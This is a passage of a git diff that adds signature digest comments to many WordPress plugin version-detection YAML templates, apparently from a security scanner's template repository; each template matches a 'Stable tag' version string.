b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a9fabd5aae6eef0f13f679bbd07eca4a427979f99f4bab4333e7878006c1d02022100f4826a1bf53ec6dfeca5fa71813625d7eda0e9ce3a93a442b34c122c4a2db04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..c4bb7aed20 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ddd90bf5c6ff60e6e1bbd4b693d7f678b21bea34ead3ecfdff1f4f60029c071022078030d949efc79e8502826407625aebaac6d5fd54c8c6ca18ed40f2075ce29d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..cca9ad52e9 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220196392bdb0ef9d369a3105bb1eda3d843031f7fd86c852a6f5a30344f88d06e3022021533a6256ba2cec27aef5520957251745edc047efaf1bb58cc493fa708e10bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..4192c70950 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc1e7bd79144601b3bb47c0779603c67e72b29287b45d72e4a3c5520f0aee9e4022100cef66700939934ed6afb77fd0cae5ece4d4e0571ed3e7f7eb7454b0e530cf83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..35ddfd2f6f 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100902f9be57fd3fb096876ca9f3027441a1e6ffdc9cfcf58750a4c8790f9f6fd39022100cbe49cc30f8fd3647ed60f0bacca7cfc47e42c098d1beb4b88c4828d15f8e21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..7bd2e5e212 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022074a68fe0cb034bf245ece47ec41d7d573aebb7b91be21afbb16b3485fa84071002202020cda867e6281255ef6f9af3d442e16f770ca9d3ddfa4dbf44e6a6f5b82f7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..21e7b1977b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207bdfccf43e33c22cb3d2c71d43cbf59ed8fb0080baec463c8f8dabc9136e435b02201a303bbfa11cd95b477de26f976cd3007480c360ad207c2361feead73fe2a43c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..f430ef9829 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220037a379e0cdff738fc77b876ffe9b43bbb0b42cd74548854b4cba6753b8d2e2c02200af8f634bcf26bbd93092b6a957ad73badbe56018dcd2c675147779c07c150b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..9a63af7f38 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b22531c70f11d49f73d7d0d0a254934415786ca8109cce95cc4b6d856d9cf73a0220051ba3bcfdde5832bf32ca7dc5f9a9051f1b65a0d70977cbcce994faef1e9f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..993c3d90b2 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220601ed53157a0bb7c55b086cb15eb9cff3c4ca65570996f96c97093cbaa72bc30022100f1d151b2e5bc90457dae4c29e2ed40f3822c504419c7cb6d7a08a4b925d70ecf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..76c1da8c33 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e43892fc9f5fee54742195009c730e4a9f8cafa58308d770cbd3349ec0d3ffe2022054a04fadb15931bbf08d5b55e8cf9a3c4447d0bbad61d65d1fa476370dc5c5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..c8e2a01a24 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220009f0ee651cab915097af1e0cbf8e8373b55bc9f296ce98ad1da39be170a3ad6022066bfd1df4f6a30ca30a08dbf5447703027e0ab2a00f522e0cb64c0c04f2333fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..2af31f83c5 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fbb088666678905d5bb618021cc84ff2e8b79f88bf4233d40fdc614a53b86add022100e3b170e69aa7cd80a1003a3a058adb096e60e75dc6b5a593f33b817843a9c5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..bdcbc1122c 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ea2b37e575863f7a5f76abec60cb87c181e36563ea63582cbb49e4f8f8e539c022100c7514655de0b97c092c6d4104b72e6dfeea9efca68071c061c51d87870caf1fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..5c535d04e7 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203aed68bbcdea42936ea5cc557decb875d5d034365cea9df058ceab387b7fff98022100fd41e8601e1aa1a44b120a0755755b924450999d900346e65e77e93239609c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..bf9a819f14 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eea3a55b3c46c691910c5d72b737fbe3690fd79c0dabf3c2ae54b027010d4bc802206d4c03943032ece634262f7906092e0a3461dcb500f27d90966a1abcbfb0c9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..4ee2ed4d18 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023f9a2b31b88617a8aeeb07e505c7d74a433c2cfa922bd45900085187dd29b2f0220158070a18dc485e470e115f5ea95952057010b362c7e2f49c6852b4a5da5a3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..b4cb84e09e 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045972cb2d7a1ef325b79dbd929d188d0b67037246d621e7d6337cf318ad4cfc40220027be7df08fa987614a62f56a882af2a5a2dd9da1d8d456c3611b312ed726416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..78ea0ee534 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031629b4c751eab3c24b745f465c50e011cae9c1bf67046a6c3b96fc16cd358ec022100d515060888b5e745b28b1423694d2db39e9372b7486f018bcaaadd8970812ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..5d8d568ae7 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f865d83ea12fd0e80529fa8cd38c2658197e75ace33daca7b82f2bae983f879b02207b6429b0d1f973de9a66a360b5150950ba0fe3523b963b359786a6e75c21cf1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..02da2f07c5 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045cf0950fce19982638fd094a50c8ed066cf7df47b87a30db1d3fac2ce81e8f0022100bb0eacdf227e4b7b6b7fd9b25f9d27d66824d0cd708805fccf18ecfec0dc64de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..eea7de58cf 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220290cb74d119d50578f2e7f46bb1fc3d38eb5c1ea9ae804694daa3ecc203c4544022100e9647debb10e9fab2c62d75dbc69591ea564f0bc97e6cc38665a0e19f6a1aa75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..78470aa5a9 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200fe11db43dd80bbb0781d32589970b0f1371ec959c5b6a6cc31c56250c6ba2d8022100e8d3d60ff7018e53c1d8042240a083b2f29c415c4b070cd9c0698933ea17dda2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..71860fcd84 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a44fd5f82d7f9f74e934eec1f9230d0a07e9361f82a95436cdbd490c0d11cfb02201c6c8d26d640cd50ca812b3c48ed4cc7d6bf940aaf64f9e8eb863e0af7d9ab74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..45d9d673ff 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022065a743e39b5131290eee07f82923d7af3c5916bf79116b68b3b2b8396bcdcfd7022061dbeb41be698d79b31ac3f00cd8c29faa46fc131fe232a927473bfeb84976c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..2a0c75f577 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ffd4e8afcc413ec7656f43235aacf76d6229ed2f7d963d790383d54c5aec223b022005fa8a6b0f52f0cdc285beef656be1be5982f546a9ee94ef727ba5825208273e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..7fe90354d4 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d93c9a79a499ff8f9f3b3d7553609e72e7e74fb2f2243b535f331246340d38c022100e1ba3323138b85a0bb572a54b7ac8251083783ba9ee5fb9563d4bb3d9ceb576f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..ec1d5f83ec 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016d81309afc8801f1f650c9a498bbad8ac5fb4ee66045377d5f1d6a8d907653f022076f9f4dba26ed45a303b1c42becf5a39fc970bc74901319800f4ba31d45b58b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..18dc8c28d4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6159eb5190bcbfbb9989a852fe313888942b26371cdabac91aae71fc8bf8b790221008346bd496e8dc15448ae00f17bca50381295520565b89be956a4dae4121afad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..78d66d4f12 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009304c15e0a854543bbdbc96ae62f92adfb38cb817896e08e3fe20a79633a08b5022076513aa87c4bb9447186b7f237174c58d612cbe4f7d3c7307694173fda37fb94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..3d1b90c0e5 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040e88eb388ecf2d2aaece6a19ac2b4746af2bc31721e697c6a87801558abe339022100f4bd5f38aedf197933f9327e64a731796b548b558d993179d7ab1bb0f283a336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..1a1b79acff 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100982eb0966f82e3ba923e9d3d89b83bffa93610001eefc6210dabc727f86b7292022100f1356b42ce1b65459d226d4483eeb27e6259a570bac2664aae1d7ba86094874c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..b6f741ad17 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd65ecae5212bedeeb6aa23c7292e05ffafc1acfc51a9255b694b5f70dc3fa7302205b794a92d5c2770a61c51df78d16cd52389b37005df1d89bf71bb01f3a96b4b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..53421c0e42 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d92f3c11ee1d4353b6aed075a246ca0319c6f5676f0a5a1e4b13b41b72b652702207b7443592ae1a721dde63816c974b5d0fdbc777f49b8e86f43d9d73354ad04cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..7ff74a15cd 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f952c204555255cad6d7fd1c6ebe15d0686672129994affb7ede8c9f135231ab022072dae74539075bf48cbbe47ba5c49062ef46ce58cc75ee4a108540343f40c80b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..dac51f089f 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220094d24ce85ce89fd274106dd318e3b895eb753d34d89d7d45fd37b7aceaf1154022005052f5ee3ca6d4adb5c21c3c0f3fa18598872874703662259de0fad6c3bc9f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..b224206553 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f829a6dc0fe0f94be929908332c45602de313f842d73c8c92a9ff4c6c902210022041d45282656fc671eca3c39bfd510fc67d0aee595cba1af9d8fc023d9c6bc4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..d1f0db8cd7 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ddaa9ea93c4714dfffa975b15ed82cf393c038d0a7362a204c99048494dc0e0d022053ea47ebb6531afd990e37b3dc048eef833be284659d22a46de391440b9277ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..142bddd7df 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088aeba65c4672a65cff69c845b90ff35533626861c8f56c466d476e7822dca1e022100d458c0bc6e4ebed03ad3cf6b992da8dfddba90e174b8441f97c50491375901f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..509a99a8ee 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203933da62beda7e5774d52cb5c772215a802a2ccf3bb87bbf86c24a3c6e66678c022100bf64baa213d50e60cde901200f0697ec617b8730294eb7d0495011ddec95b3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..d680949003 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3edb8af38875401f46fc8a142b1aa15f58501193d1656acaf7459b451d10231022100cae34d35e7b85bab19d671bdd837736736cc5231cbcc7608dfa7e251c62d7a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..bd7b7857c0 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010c53988782fc6cad0203f5598338fe0c083cd360c9e6b1ad240a1c4bba24216022100a3fd9200edf2c506f6795643adb20f1a53c94960e1ee0b967ebc3fa977dcfbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..707e93ac42 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205093dc7024015d33baf8c3f6024a8a740e5c9872c5b3560742bce88d13d7cb5502204d5f1391977a92a0e56f27cbadd4acfb88d8e787700a2ce2db09db8f8e0305c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..21b5d67eea 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a756ddae584e93d86a8c456ef30d546ebcc754ad2b7b6aa4b470a2ed68cca19d022100902c93696d2ce698824c5c989c2d12d7521dd120727d5ee3a5cb604de597be22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..6c72acbb97 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220155994ef9bd41341955ae3f0f2b39c7ddadb04ea679982b671236501be5d37b80221008e1e05aae152e37e2f8141d255b4da2c7619ab113798f38e16549fae25c1be19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..8eb7ed31e7 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8c022b0013ec8ace9d43452a666a401d50ffdac2ef2f920c53d0b2b7dbc0f3102206350700ba4b17d1ec9e7cba0163937286516902e6f06f3e6d9693d3984d72d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..23e4345102 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 